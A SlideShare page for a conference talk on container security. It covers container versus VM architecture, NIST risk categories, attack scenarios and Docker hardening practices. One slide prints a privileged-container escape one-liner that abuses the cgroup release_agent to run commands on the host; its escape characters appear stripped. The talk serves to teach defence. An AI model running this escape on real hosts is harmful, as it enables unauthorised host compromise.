SlideShare a Scribd company logo
Container Security
Jie @ InfoSec2020
Nov/02/2020
curl -X GET https://2130706433/info
{
“Name”:
“Jie”,
“Experience”: [
“IBM Security”,
“Qualcomm”,
“National Center of High-Performance Computing”],
“Certification”: [
“CCIE #50382”,
“OSCP”,
“CEH”]
} https://www.linkedin.com/in/jieliau
https://github.com/jieliau
https://www.facebook.com/jie.liau
https://twitter.com/0xJieLiau
https://medium.com/@liau.weijie
Gartner predicts that by 2023,
70% of organizations will be running three or more containerized applications in production
?
Infrastructure
Hypervisor
Guest OS Guest OS Guest OS
Bin/Lib Bin/Lib Bin/Lib
App1 App2 App2
Infrastructure
Host OS
Bin/Lib Bin/Lib Bin/Lib
App1 App2 App3
Container Engineer
Virtual Machine Virtual Machine Virtual Machine
Containerized
Application
Containerized
Application
Containerized
Application
Open Container Initiative - OCI
• Runtime Spec
• namespace
• cgroups
• Image Spec
• Layer
• Image index
• Configuration
Container Security
Container Security
Container Security
Security Issues
Host OS Risk
Orchestration System Risks Image Risks
Container Runtime RisksRegistry Risks
•Improper user access rights
•OS vulnerabilities
•Unbounded admin access
•Weak or unmanaged credentials
•Unmanaged inter-container network
traffic
•Mixed of workload sensitivity levels
•Insecure connections to registries
•Stale images in registries
•Image vulnerabilities
•Image configuration
•Embedded malware
•Embedded secrets
•Image trust
•Vulnerabilities within the runtime
software
•Unbounded network access from
containers
•Insecure container runtime
configurations
•Shared kernel
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
Container escape to the host
Container should not run as root
Use non-root user in your Dockerfile
Privileged Container is so Bad
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
https://twitter.com/_fel1x/status/1151487051986087936
Bad Image
Open Docker API
Docker host
Client Host
Geek
Attack Scenario I
Vulnerable Container
1. Attack vulnerable container
2. Compromise the host
Docker Host or K8s Cluster
Attack Scenario II
Bad Container
1. Push bad image
2. Deploy by admin
3. Create bad container
Docker Host or K8s cluster
Attack Scenario III
Privileged Container
1. Find out open docker host
2. Create privileged container
3. Compromise the host
Open Docker Host
Bad Image for Cryptocurrency Mining
https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
Kinsing Malware Attacks Targeting Container Env
https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
Container Security
BestPractices
• Always use the most up to date version of Docker
• Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group
• Run your containers as a non-root user (UID not 0)
• Use only trusted base images when building your containers
• Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface
• Don’t store secrets in images/Dockerfiles
• When running containers, remove all capabilities not required for the container to function as needed
• Don’t run containers with –privileged flag
• Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way
that could lead to host compromise
• Don’t run sshd within containers
• Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data
• Make sure you have rules in place that give you an audit trail for:
• Docker daemon and Docker files and directories:
• /var/lib/docker
• /etc/docker
• docker.service
• docker.socket
• /etc/default/docker
• /etc/docker/daemon.json
• /etc/sysconfig/docker
• /usr/bin/containerd
• /usr/sbin/runc https://www.stackrox.com/post/2019/09/docker-security-101/
CAP-ADD instead of Privileged
• —cap-add
• SYS_ADMIN
• NET_ADMIN
• MAC_ADMIN
• NET_RAW
• SYS_TIME
• SYSLOG
• …
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
Limit Resource Usage
• —memory
• —cpus
• —cpu-period
• —pids-limit
• —kernel-memory
• —device-read-bps
• —device-read-ios
• —device-write-bgp
• —device-write-ios
https://docs.docker.com/config/containers/resource_constraints/
Open Source Tools for Docker Security
• Docker Bench for Security
• Clair
• Cilium
• Anchore
• OpenSCAP Workbench
• Dagda
• Notary
• Grafaes
• Sysdig Falco
• Banyanops Collector
https://techbeacon.com/security/10-top-open-source-tools-docker-security
Container Security
Container Visibility is So Damn Important
https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
https://github.com/sysflow-telemetry
References
• https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/
• https://www.docker.com/blog/containers-replacing-virtual-machines/
• https://blog.aquasec.com/cve-2016-9962-run-container-run
• https://medium.com/@mccode/processes-in-containers-should-not-run-as-
root-2feae3f0df3b
• https://containerjournal.com/topics/container-security/why-running-a-privileged-
container-is-not-a-good-idea/
• https://docs.docker.com/engine/api/
• https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate
• https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/
malicious-docker-hub-container-images-cryptocurrency-mining
• https://docs.docker.com/config/containers/resource_constraints/
• https://techbeacon.com/security/10-top-open-source-tools-docker-security
ThankYou!!!

More Related Content

What's hot

K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
Sharon Vendrov
 
Introduction to container based virtualization with docker
Introduction to container based virtualization with dockerIntroduction to container based virtualization with docker
Introduction to container based virtualization with docker
Bangladesh Network Operators Group
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
Phil Estes
 
Docker internals
Docker internalsDocker internals
Docker internals
Rohit Jnagal
 
Docker Introduction
Docker IntroductionDocker Introduction
Docker Introduction
Jeffrey Ellin
 
Docker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker NetworkingDocker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker Networking
Docker, Inc.
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
Volodymyr Shynkar
 
Container Security
Container SecurityContainer Security
Container Security
Amazon Web Services
 
Introducing Vault
Introducing VaultIntroducing Vault
Introducing Vault
Ramit Surana
 
Docker and the Linux Kernel
Docker and the Linux KernelDocker and the Linux Kernel
Docker and the Linux Kernel
Docker, Inc.
 
Alphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et ConfigurationAlphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et Configuration
Alphorm
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
Docker, Inc.
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
RyanISI
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
Aqua Security
 
Midi technique - présentation docker
Midi technique - présentation dockerMidi technique - présentation docker
Midi technique - présentation docker
Olivier Eeckhoutte
 
Kubernetes - introduction
Kubernetes - introductionKubernetes - introduction
Kubernetes - introduction
Sparkbit
 
A Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdfA Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdf
Edith Puclla
 
Docker 101
Docker 101Docker 101
Docker 101
Lâm Đào
 
Docker introduction
Docker introductionDocker introduction
Docker introduction
Phuc Nguyen
 
Docker
DockerDocker

What's hot (20)

K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
Introduction to container based virtualization with docker
Introduction to container based virtualization with dockerIntroduction to container based virtualization with docker
Introduction to container based virtualization with docker
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
 
Docker internals
Docker internalsDocker internals
Docker internals
 
Docker Introduction
Docker IntroductionDocker Introduction
Docker Introduction
 
Docker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker NetworkingDocker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker Networking
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
 
Container Security
Container SecurityContainer Security
Container Security
 
Introducing Vault
Introducing VaultIntroducing Vault
Introducing Vault
 
Docker and the Linux Kernel
Docker and the Linux KernelDocker and the Linux Kernel
Docker and the Linux Kernel
 
Alphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et ConfigurationAlphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et Configuration
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
Midi technique - présentation docker
Midi technique - présentation dockerMidi technique - présentation docker
Midi technique - présentation docker
 
Kubernetes - introduction
Kubernetes - introductionKubernetes - introduction
Kubernetes - introduction
 
A Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdfA Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdf
 
Docker 101
Docker 101Docker 101
Docker 101
 
Docker introduction
Docker introductionDocker introduction
Docker introduction
 
Docker
DockerDocker
Docker
 

Similar to Container Security

Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a WalkthroughContainer Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Nico Meisenzahl
 
ContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack KubernetesContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack Kubernetes
Nico Meisenzahl
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
Nico Meisenzahl
 
Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2
AzureEzy1
 
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Matt Raible
 
Secure your Azure Web App 2019
Secure your Azure Web App 2019Secure your Azure Web App 2019
Secure your Azure Web App 2019
Frans Lytzen
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
Nico Meisenzahl
 
Tips and best practices for Docker
Tips and best practices for DockerTips and best practices for Docker
Tips and best practices for Docker
Calidad Infotech
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
Frans Lytzen
 
Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020
Matt Raible
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
Gianluca Varisco
 
Contain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidenceContain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidence
Black Duck by Synopsys
 
Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20
Matt Raible
 
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut FrameworkNative Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Zachary Klein
 
Microservices in the Enterprise
Microservices in the Enterprise Microservices in the Enterprise
Microservices in the Enterprise
Jesus Rodriguez
 
How to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being HackedHow to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being Hacked
Nico Meisenzahl
 
Secure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in AzureSecure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in Azure
kloia
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
Ksenia Peguero
 
Understanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities pointsUnderstanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities points
Abdul Khan
 
Docker Security
Docker SecurityDocker Security
Docker Security
antitree
 

Similar to Container Security (20)

Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a WalkthroughContainer Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a Walkthrough
 
ContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack KubernetesContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack Kubernetes
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
 
Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2
 
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
 
Secure your Azure Web App 2019
Secure your Azure Web App 2019Secure your Azure Web App 2019
Secure your Azure Web App 2019
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
 
Tips and best practices for Docker
Tips and best practices for DockerTips and best practices for Docker
Tips and best practices for Docker
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
 
Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
Contain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidenceContain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidence
 
Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20
 
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut FrameworkNative Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
 
Microservices in the Enterprise
Microservices in the Enterprise Microservices in the Enterprise
Microservices in the Enterprise
 
How to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being HackedHow to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being Hacked
 
Secure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in AzureSecure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in Azure
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
 
Understanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities pointsUnderstanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities points
 
Docker Security
Docker SecurityDocker Security
Docker Security
 

More from Jie Liau

iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
Jie Liau
 
OWASPAPISecurity
OWASPAPISecurityOWASPAPISecurity
OWASPAPISecurity
Jie Liau
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPI
Jie Liau
 
iThome CyberSec2021 Container Security
iThome CyberSec2021 Container SecurityiThome CyberSec2021 Container Security
iThome CyberSec2021 Container Security
Jie Liau
 
Protecting Your Internet Route Integrity
Protecting Your Internet Route IntegrityProtecting Your Internet Route Integrity
Protecting Your Internet Route Integrity
Jie Liau
 
The Tor Network
The Tor NetworkThe Tor Network
The Tor Network
Jie Liau
 
IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017
Jie Liau
 
DDoS
DDoSDDoS
DDoS
Jie Liau
 
Shell Shock
Shell ShockShell Shock
Shell Shock
Jie Liau
 

More from Jie Liau (9)

iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
 
OWASPAPISecurity
OWASPAPISecurityOWASPAPISecurity
OWASPAPISecurity
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPI
 
iThome CyberSec2021 Container Security
iThome CyberSec2021 Container SecurityiThome CyberSec2021 Container Security
iThome CyberSec2021 Container Security
 
Protecting Your Internet Route Integrity
Protecting Your Internet Route IntegrityProtecting Your Internet Route Integrity
Protecting Your Internet Route Integrity
 
The Tor Network
The Tor NetworkThe Tor Network
The Tor Network
 
IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017
 
DDoS
DDoSDDoS
DDoS
 
Shell Shock
Shell ShockShell Shock
Shell Shock
 

Recently uploaded

(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
Priyanka Aash
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Kunal Gupta
 
What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024
Toru Wonyoung Choi
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
David Wilson
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
Priyanka Aash
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
Baishakhi Ray
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
SynapseIndia
 
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptxIntroduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
313mohammedarshad
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
HackersList
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
Priyanka Aash
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
Tatiana Al-Chueyr
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
Neo4j
 
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
Priyanka Aash
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
shyamraj55
 

Recently uploaded (20)

(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
 
What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
 
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptxIntroduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
 
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
 

Container Security

  • 1. Container Security Jie @ InfoSec2020 Nov/02/2020
  • 2. curl -X GET https://2130706433/info { “Name”: “Jie”, “Experience”: [ “IBM Security”, “Qualcomm”, “National Center of High-Performance Computing”], “Certification”: [ “CCIE #50382”, “OSCP”, “CEH”] } https://www.linkedin.com/in/jieliau https://github.com/jieliau https://www.facebook.com/jie.liau https://twitter.com/0xJieLiau https://medium.com/@liau.weijie
  • 3. Gartner predicts that by 2023, 70% of organizations will be running three or more containerized applications in production
  • 4. ?
  • 5. Infrastructure Hypervisor Guest OS Guest OS Guest OS Bin/Lib Bin/Lib Bin/Lib App1 App2 App2 Infrastructure Host OS Bin/Lib Bin/Lib Bin/Lib App1 App2 App3 Container Engineer Virtual Machine Virtual Machine Virtual Machine Containerized Application Containerized Application Containerized Application
